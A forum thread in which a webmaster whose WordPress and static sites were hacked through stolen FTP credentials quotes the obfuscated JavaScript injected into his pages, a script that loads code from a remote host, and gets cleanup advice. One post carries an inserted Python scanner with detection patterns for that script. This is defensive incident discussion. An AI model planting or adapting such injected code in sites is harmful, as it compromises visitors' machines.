
Sites Hacked - redirect - inject

Discussion in 'Black Hat SEO' started by AdisLCS, Jan 29, 2010.

  1. AdisLCS

    Found out a few minutes ago that a few sites got hacked and some weird-ass code was injected. Anyone know wtf this is?

    (All infected sites are on the same shared hosting.) So far it looks like it's just index injection.
    I will have to go through all the pages and check them, which will be a pain in the butt. I changed the CP password and will look into last visitors and pages to try to locate the entry point. Any other suggestions?

    Here is the code from the index:


    try{window.onload=function(){document.write('sitesell-com.time.com.wor');Jnpe8xhce3al = document.getElementById('Esbxhxeuur61').innerHTML + 'd@)&p(r@^e))^s^!s)@-(#^!o@r&#(g@$.^)e&(#u#(#r(^#o^$#s@^&h&#(a^!r!&e^&s&&^(.&)r($!u(&:()&S(@#d&t(#@2(o(#@e!(^l(@@w)3$(e^@#b@p)#^@2@@!i^&/^)g#&^o{msg}o)$)g()^l(e#.@#^(c&o$!#m)#!/#)#g#o#&!o!g$^l&)e^&.{msg}(c##(o)(@m)&/)5#^5!^!b($!b$(s!^$.)^)c&@^$o!^)&m#&^/))!)b&#u^&s((i)$#n#(!e@&s#!s$!&)w$e&e$@k!.^)c&&o((@m#/&^a()d^)d(i##c&^t#!i#^n$)#g^!g(&#a@$m)^@#e!{msg}$s!!$@.($c@)o(#m$^^/^(&)'.replace(/\!|@|\$|#|&|\)|\^|\(/ig, '') ;document.write('');} } catch(Qssnfjsvu ) {}


    Any ideas, suggestions?

    Thanks
     
  2. AdisLCS

    BTW, the sites are WordPress and static HTML.
    Here is the full code, anyone got an idea?

    <script> try{window.onload=function(){document.write('<div id=Esbxhxeuur61>sitesell-com.time.com.wor</div>');Jnpe8xhce3al = document.getElementById('Esbxhxeuur61').innerHTML + 'd@)&p(r@^e))^s^!s)@-(#^!o@r&#(g@$.^)e&(#u#(#r(^#o^$#s@^&h&#(a^!r!&e^&s&&^(.&)r($!u(&:()&S(@#d&t(#@2(o(#@e!(^l(@@w)3$$(e^@#b@p)#^@2@@!i^&/^)g#&^o$&o)$)g()^l(e#.@#^(c&o$!#m)#!/#)#g#o#&!o!g$^l&)e^&.$&(c##(o)(@m)&/)5#^5!^!b($!b$(s!^$.)^)c&@^$o!^)&m#&^/))!)b&#u^&s((i)$#n#(!e@&s#!s$!&)w$$e&e$@k!.^)c&&o((@m#/&^a()d^)d(i##c&^t#!i#^n$$)#g^!g(&#a@$m)^@#e!$&$s!!$@.($c@)o(#m$^^/^(&)'.replace(/\!|@|\$|#|&|\)|\^|\(/ig, '') ;document.write('<scr'+'ipt src=h'+'ttp://'+Jnpe8xhce3al.replace(/Sdt2oelw3ebp2i/g, '8080')+'></scr'+'ipt>');} } catch(Qssnfjsvu ) {}</script>
    <!--f44f30b9cd1bfceafeb1f82bed7db035-->
     
  3. Subject

    The same happened to me last week on a WordPress site and another site.

    This is what happened: I visited some sites and my firewall said something in the temporary folder was trying to connect outside, so I blocked it. At that time, my FTP programs were running. Although the firewall blocked the connection, somehow they got my FTP traffic and got my FTP passwords...

    After some time, when I was trying to visit my sites, I noticed something in the browser's status bar. It's like it was trying to connect to some site... I then replaced all index.php files in my sites (there were 27), but no hope; the browser was still showing it was trying to connect...

    I then reinstalled Windows, changed the FTP password, and re-uploaded the files to the sites.

    Now there is no problem.

    You should change your control panel and FTP passwords and clean your sites.
     
  4. AdisLCS

    Thanks. I noticed my Avira warning about a temp file while looking at an advertiser landing page on the Marketleverage affiliate network (I think it was a tax relief program); it started redirecting, and I disconnected the internet and restarted the computer. A couple of hours later the sites were hacked.

    So people, beware of Marketleverage, even though I think it might be a bad apple or they may be a victim themselves.

    I have cleaned the static sites but still have issues with the WordPress one; Firefox gives some weird error about "content encoding error".
    I think it has to do with some plugins but will browse around the net for a solution.
     
  5. AdisLCS

    Just as an update: I think I have finally cleaned all the code. If someone comes across the same situation, I guess the best advice is to use common sense and be cautious.

    As mentioned above, the trojan got hold of the SmartFTP history and thus was able to inject code across almost all sites on several hosting providers.

    Good thing it was not an XSS but an FTP compromise.

    - First thing I did was change all passwords: hosting, CP, DB, admins, etc.
    - Then I used Avira, Malwarebytes and Kaspersky to clean the local machine; Kaspersky did the best job and was even able to identify code within pages.

    - Next thing was taking care of the infected websites - it appears just index, home and .js files were compromised.

    One of the hosts took care of it within a few minutes and ran a virus scan, checked for brute force and shells to make sure the trojan did not linger somewhere else, and additionally went through the logs and blocked unauthorized IPs that accessed FTP. Most were Chinese, Taiwanese and some USA, but most likely proxy stuff.

    - GoDaddy's advice, as almost always when called in, was basically "google it", so I ended up using the file manager to sort files by date modified to identify infected pages and .js files.
    It was a pain in the butt as I have deluxe hosting, and a couple of economy ones with a ton of folders, subfolders, etc. Pretty tedious but it did the job.

    GoDaddy also has an option within hosting/file manager to view archived files. You click on history and choose a date from the top left corner of the file manager, and you see colored indicators if current files have been changed compared to the selected date. That feature made it a bit easier even though I had to go through each folder by itself.

    My WP sites were a bit trickier as the code was injected in almost all folders including themes, plugins etc., so I ended up just cleaning wp-content and uploading new wp-includes and wp-admin.

    I think I got all of the code out but will do final checks to make sure. I hope someone with the same problem will be able to look at this post and find some helpful info.

    Again, the best probable advice is to use common sense and be cautious, don't panic, and make sure to have regular backups along with updates and proper security measures.

    Thank you
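    The sort-by-date-modified triage in the post above can be scripted. The following is an added example, not code from the thread or any poster: it walks a web root, flags files carrying the signatures visible in the injection posted earlier (the junk-character-stripping replace(), the split "<scr'+'ipt" write, and the 32-hex-digit comment marker), and lists them newest-modified first. The sample web root, its file names and contents are constructed for the demo; the marker regex is an assumption that such markers are always 32 hex digits.

```python
import re
import tempfile
from pathlib import Path

# Signatures taken from the injection posted in this thread: a replace() that
# strips junk characters out of a scrambled hostname, a split "<scr'+'ipt"
# write, and the 32-hex-digit HTML comment left after the script block
# (assumed here to always be exactly 32 hex digits).
SIGNATURES = {
    "char-strip-replace": re.compile(
        r"\.replace\(/\\!\|@\|\\\$\|#\|&\|\\\)\|\\\^\|\\\(/ig,\s*''\)"),
    "split-script-write": re.compile(r"'<scr'\s*\+\s*'ipt", re.I),
    "hex-marker-comment": re.compile(r"<!--[0-9a-f]{32}-->"),
}
SCAN_EXTS = (".html", ".htm", ".php", ".js")

def matching_signatures(text):
    """Names of the signatures found in one file's content."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_webroot(root):
    """Walk a web root and return flagged files, most recently modified first,
    mirroring the sort-by-date-modified triage described in the thread."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXTS:
            continue
        hits = matching_signatures(path.read_text(errors="replace"))
        if hits:
            findings.append((path.stat().st_mtime, str(path), hits))
    findings.sort(reverse=True)
    return findings

# Constructed sample files (not from a real site) so the scan runs offline.
CLEAN_PAGE = "<html><body><script>var s='x'.replace(/a/g,'b');</script></body></html>"
INJECTED_PAGE = (
    "<html><body>ok</body></html>\n"
    "<script>try{window.onload=function(){v='h@o)st'"
    ".replace(/\\!|@|\\$|#|&|\\)|\\^|\\(/ig, '');"
    "document.write('<scr'+'ipt src=h'+'ttp://'+v+'></scr'+'ipt>');}}catch(e){}</script>\n"
    "<!--0123456789abcdef0123456789abcdef-->\n"
)

def build_sample_webroot():
    """Create a throwaway web root with one clean and one injected file."""
    root = Path(tempfile.mkdtemp())
    (root / "about.html").write_text(CLEAN_PAGE)
    (root / "blog").mkdir()
    (root / "blog" / "index.php").write_text(INJECTED_PAGE)
    return root

if __name__ == "__main__":
    for mtime, path, hits in scan_webroot(build_sample_webroot()):
        print(f"{path}: {', '.join(hits)}")
```

    Point scan_webroot() at a downloaded copy of the site; files that match only the hex-marker signature still deserve a manual look, since the marker outlives the script block when a partial cleanup removes only the <script>.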
     
  6. Subject

    Load your site and watch the status bar on your browser.
    If you see any unusual website activity, consider that you got hacked...

    The status bar will show "connecting", "connected to", "waiting for", "transferring data from" etc. Watch whether your site is connecting to any sites that are not known or not allowed by you.
     
  7. dogdog

    Complain to the marketing company. If they are not the culprit themselves, then they will take action against the affiliate in question. They can easily identify who the referral is.
     
  8. duca

    I'm curious which WordPress version your sites are running?
    Maybe upgrading to the latest version will prevent situations like this... :rolleyes:
     
  9. SEO20

    WordPress has historically been a popular victim. Always upgrade to the newest version. Change your password and make it strong.
     
  10. durjoy

    I guess Joomla is worse than WordPress. Joomla sites get hacked very frequently.
     
  11. SEO20

    Joomla is one big joke :)
     
  12. duca

    Well, WordPress is a popular publishing platform, which also makes it a popular target :)
     
  13. AdisLCS

    In my case it was not really a WP issue but the trojan that grabbed the FTP logins.
    It sneaked in from Marketleverage's advertiser (it was a $11 per lead Tax Relief offer); their site was infected and anyone viewing the landing page must have gotten the same thing. I did call ML emergency that night and spoke to Eric; he thanked me and said they will take care of the issue. It is sad that the trojan was very well positioned on an affiliate network, knowing there would be webmasters.
     
  14. dd-mdd

    Another way to verify if your site is hacked is by using this free online tool:

    http://sucuri.net

    It will monitor your web sites, domains, whois info, blacklisting status, etc. and
    alert you if they are hacked, defaced, hijacked, etc.